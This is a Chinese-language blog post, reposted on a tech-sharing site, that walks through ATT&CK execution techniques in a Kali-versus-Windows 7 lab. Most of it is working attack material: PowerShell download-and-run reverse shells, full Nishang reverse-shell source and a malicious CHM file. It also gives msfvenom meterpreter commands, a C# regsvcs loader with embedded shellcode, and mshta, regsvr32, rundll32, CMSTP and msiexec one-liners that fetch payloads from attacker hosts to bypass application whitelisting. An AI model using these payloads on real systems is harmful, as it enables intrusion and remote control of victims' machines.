标签:ck exe http 243.133 0x00 192.168 dll ATT 数据交换
目录
本地-Signed Script Proxy Execution(签名脚本代理执行)
Regsvcs/Regasm(.NET 服务安装工具/程序集注册工具)
Trusted Developer Utilities(值得信赖的开发者工具)
ATT&ck命令执行 —— 远程动态数据交换
Empire介绍
Empire 是一个纯粹的PowerShell 后开发代理建立在密码安全的通信和灵活的架构。
Empire 实现了无需powershell.exe 即可运行powershell代理的功能,从键盘记录到mimikatz等快速部署的后期开发模块,以及适应性通信以逃避网络检测,所有这些都包含在以可用性为中心的框架中。
git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh
./empire
环境
攻击机 kali 192.168.243.133
受害机 win7 x64 192.168.243.154
- 设置监听
- 运行进行监听
- 生成木马
将生成的木马文件 /tmp/launcher.bat 在受害机器上【win7 x64】运行
- 输入 agents 进行回连查看信息
命令行界面
C:\Users\root\Desktop>PowerShell IEX (New- Object Net.WebClient).DownloadString( VPS/Invoke-PowerShellTcp.ps1');Invoverse -IPAddress 192.168.243.133 - Port 666
Nc -lvp 666
本地-Signed Script Proxy Execution(签名脚本代理执行)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
在远程 web 服务器根目录写入 1.sct 文件如下: pubprn.vbs 方式
root@kali:~# cat 123.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true" >
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
Wscript 方式
启动 Empire 生成 vbs 脚本
设置监听地址信息
输入 “execute"运行,生成VBS代码;使用agents 列出列表
或者
C:\Users\root\Desktop>wscript launcher.vbs
执行一次,响应一次;获取目标代理
获取SHELL
agents
(Empire: agents) > interact RWACGHYM
(Empire: RWACGHYM) > shell ipconfig
chm
介绍
CHM 文件格式是微软于 1998 年推出的基于 HTML 文件特性的帮助文件系统,以替代早先的 WinHelp 帮助系统。它在 Windows 98 中把 CHM 类型文件称作“编译的 HTML 帮助文件”(Compiled HTML Help file);被 IE 浏览器支持的JavaScript, VBScript, ActiveX, Java Applet, Flash, 常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,CHM同样支持,并可以通过 URL 与 Internet 联系在一起;
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
创建恶意 chm 文件
SIP.html
<html>
<h1>blue team</h1>
<body>
Security
</body>
</html>
STA.html
<html>
<h1>blue team</h1>
<body>
Network
</body>
</html>
Index.html
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 he
ight=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe,-nop -w hidden -c IEX (New-Object
Net.WebClient).DownloadString('192.168.243.134/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.243.133 -Port 666">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
CMSTP
介绍
CMSTP是一个与Microsoft连接管理器配置文件安装程序关联的二进制文件。它接受INF文件,这些文件可以通过恶意命令武器化,以脚本(SCT)和DLL的形式执行任意代码。它是一个受信任的Microsoft二进制文件,位于以下两个Windows目录中。
通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC.
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64(192.168.243.154)
过程
1.通过 Metasploit Framework 的 msfvenom 生成恶意 DLL 文件 (pentestlab.dll)。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.243.133 LPORT=3333 -f dll > /root/Desktop/pentestlab.dll
INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执行 的 WebDAV 位置。
cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Pentestlab" ShortSvcName="Pentestlab"2、INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执 行的 WebDAV 位置。
[RegisterOCXSection]
C:\Users\root\Desktop\pentestlab.dll
3、Metasploit multi/handler 模块需要配置为接收连接。
4、当恶意 INF 文件与 cmstp 一起提供时,代码 将会在后台执行。
cmstp.exe /s cmstp.inf
5、获得 Meterpreter 会话。
本地-CPL
介绍
CPL文件,是Windows控制面板扩展项,CPL全拼为Control Panel Item;在系统安装目录的system32下面有一系列.cpl文件,它们分别对应着控制面板中的项目
CPL文件本质是Windows可执行性文件,但不属于可以直接独立运行的文件,通常由shell32.dll打开
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
第一步是创建一个 dll 并将其重命名为.cpl,以便它可以与控制面板一起 执行,Metasploit 的 Msfvenom 可以创建一个自定义的 dll,其中可以包含一个嵌 入的 meterpreter 有效载荷或者 Didier Stevens 的 cmd DLL 文件,可以用来绕过 禁止 cmd 运行的限制。
1、msfvenom 生成 payload
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.243.133 lport=3333 -f dll -o pentestlab.cpl
2、msf 设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LPORT 3333
exploit -j
3、以下命令将创建一个注册表键,这个注册表键的值将包含存储在主机上的 CPL 文件的路径。 默认情况下,标准用户对自己的配置单元是具有写入权限的。
reg add "HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Co ntrol Panel\Cpls" /v pentestlab.cpl /t REG_SZ /d "C:\cpl\pentestlab.cpl"
4.打开控制面板执行 payload 或者 control pentestlab.cpl,获取 Meterpreter 会 话
成功获取 session
本地-Forfiles
介绍
forfiles是windows自带的一个批量删除命令,对于时间的判断是通过文件自身的修改日期属性进行判断,使用它来对历史文件进行判断删除是个不错的选择。
forfiles 命令用来搜索不同盘符指定文件或文件夹, 更新软件或执行批处理程序都非常方便, 其语法为: forfiles /p 要搜索的文件夹或盘符 /m 要搜索的文件类型 /s 递归搜索文件 /c 执行文件命令
详细命令:https://www.jb51.net/softs/498793.html
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1、forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
本地-IEExec
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe http://192.168.243.133/evil.exe
InfDefaultInstall
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64(192.168.243.154)
过程
InfDefaultInstall.exe shady.inf
[Version]
Signature=$CHICAGO$
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092 f58cbb3f7d302/raw/ef22366bfb62a2ddea8c5e321d3ce2f4c95d2a66/Backdoor-Mi nimalist.sct
InstaIIUtil
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
工具地址: https://github.com/khr0x40sh/WhiteListEvasion.git
例子
生成 sc 有效载荷 python InstallUtil.py --csfile temp.cs --exefile temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.243.133 --lport 443
实战演示
生成二进制文件 .\csc.exe pentestlab.cs
执行二进制文件 .\InstallUtil.exe /logfile= /logtoconsole=false /u pentestlab.exe
msf 设置
成功获取 session
获取 shell
MSHTA
介绍
mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
攻击手法:
1、在 kali 上启动 Empire 框架后输入: listeners uselistener http set Host http://192.168.243.133 set Port 8080 execute
输出
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host http://192.168.243.133
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Name mshta
(Empire: listeners/http) > execute [*] Starting listener 'mshta' * Serving Flask app "http" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off [+] Listener successfully started!
(Empire: listeners/http) > listeners [*] Active listeners: Name Module Host Delay/Jitter KillDate ---- ------ ---- ------------ ---- ---- mshta http http://192.168.243.133:8080 5/0.0
(Empire: listeners) >
Empire 生成 hta 文件
usestager windows/hta
set Listener http
set OutFile /root/Desktop/1.hta
execute
Python 开启 web 服务;
受害机执行 cd /root/Desktop/ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
Win7 执行:
mshta.exe http://10.100.19.19:80/1.hta [payload 监听的端口和下载的端口不能同一个]
Empire 成功收到受害机 shell
MSIexec
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1、通过 msfvenom 生成 payload msfvenom -a x86 -f msi -p windows/exec CMD=calc.exe -o calc.png
2、搭建简单 web 服务器 python -m SimpleHTTPServer 80
3、在本地计算机上下载文件后,使用 msiexec 运行 payload msiexec /q /i http://192.168.243.133/calc.png
Pcalua
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
C:\windows\system32\pcalua.exe -a
C:\file.lnk C:\windows\system32\pcalua.exe -a notepad.exe
C:\windows\system32\pcalua.exe -a \\server\payload.dll(本地执行远程主机 payloa d)
Regsvcs/Regasm(.NET 服务安装工具/程序集注册工具)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
1.使用 powershell 转换出 key.snk
PS D:\> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2P WGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW 979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0q u/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv 7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNO E79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hito lufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0 361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRv kWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOef cacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7q eEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmt L6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLN iHfVjNi53Yg4='
PS D:\> $Content = [System.Convert]::FromBase64String($key)
PS D:\> Set-Content key.snk -Value $Content -Encoding Byte
2、MsfVenom 生成 C#版的 ShellCode,复制 ShellCode 到一个文件中命名为 regsvcs.cs
msfvenom -a x86 -platform Windows -p windows/meterpreter/reverse_tcp LHOST =10.100.19.19 LPORT=4444 -f csharp
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter:
@subTee License: BSD 3-Clause Create Your Strong Name Key -> key.snk $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP 9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzV AgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaff HS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531 ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpV P1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh +WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsS VWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerj mDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEH PX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0 OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv 8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi5 3Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseSe rvices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll [OR] C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll //Executes UnRegisterClass If you don't have permissions C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll //This calls the UnregisterClass Method */ namespace regsvcser { public class Bypass : ServicedComponent { public Bypass() { Console.WriteLine("I am a basic COM Object"); } [ComRegisterFunction] //This executes if registration is successful public static void RegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute"); Shellcode.Exec(); } [ComUnregisterFunction] //This executes if registration fails public static void UnRegisterClass ( string key ) { Console.WriteLine("I shouldn't really execute either."); Shellcode.Exec(); } } public class Shellcode { public static void Exec() { // native function's compiled code // generated with metasploit // executes calc.exe byte[] shellcode = new byte[341] { 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c, 0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54, 0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0x0a,0x64,0x13,0x13, 0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50, 0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5, 0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67, 0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff, 0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00, 0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56, 0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58, 0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5, 0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85, 0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1, 0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 }; UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; // prepare data IntPtr pinfo = IntPtr.Zero; // execute native code hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return; } private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); } }
3、msf 设置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.243.133
set LHOST 4444
exploit -j
4、微软.NET 框架包含了一个可以在 cmd 中运行的 VC#
编译器并且可以生成恶意的 DLL 文件,key.snk 文件可以用来对生成的 DLL 作签名。
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseSe rvices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
5、执行 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
获得 Meterpreter 会话
regsvr32
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
工具地址:https://github.com/Hood3dRob1n/JSRat-Py.git
1、在 kali 上运行 JSRat.PY python JSRat.py -i 192.168.243.133 -p 3333
2、受害机执行命令 regsvr32.exe /u /n /s /i:http://192.168.243.133:3333/file.sct scrobj.dll
3.kali 成功获取受害机 shell
Rundll32
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
rundll32 AllTheThings.dll,EntryPoint rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://rev erse-tcp.xyz/payload.sct");window.close(); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20 ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-O bject Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratas hok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Rev erse -IPAddress 10.100.18.20 -Port 3333;" rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20Active XObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new% 20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseTe xt;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /i m rundll32.exe",0,true);} rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20Active XObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Scripting(脚本执行)
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
vbs 生成 vbs 代码
Bat 生成 bat 批处理文件
目标主机执行
Empire 成功获取 agent
执行系统命令
2.jscript
https://gist.github.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec
SyncAppvPublishingServer
环境
攻击机:Kali(192.168.243.133)
受害机:Win7 X64 (192.168.243.154)
过程
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.19.19 LPORT=4 444 -f psh-reflection >4444.ps1 2、SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString(' http://10.100.19.19/4444.ps1');4444.ps1 | IEX"
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient). DownloadString('http://10.100.19.19/4444.ps1');4444.ps1"
未复现成功
Trusted Developer Utilities(值得信赖的开发者工具)
40.WMI (T1047)
标签:ck,exe,http,243.133,0x00,192.168,dll,ATT,数据交换 来源: https://blog.csdn.net/weixin_43650289/article/details/113529924
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。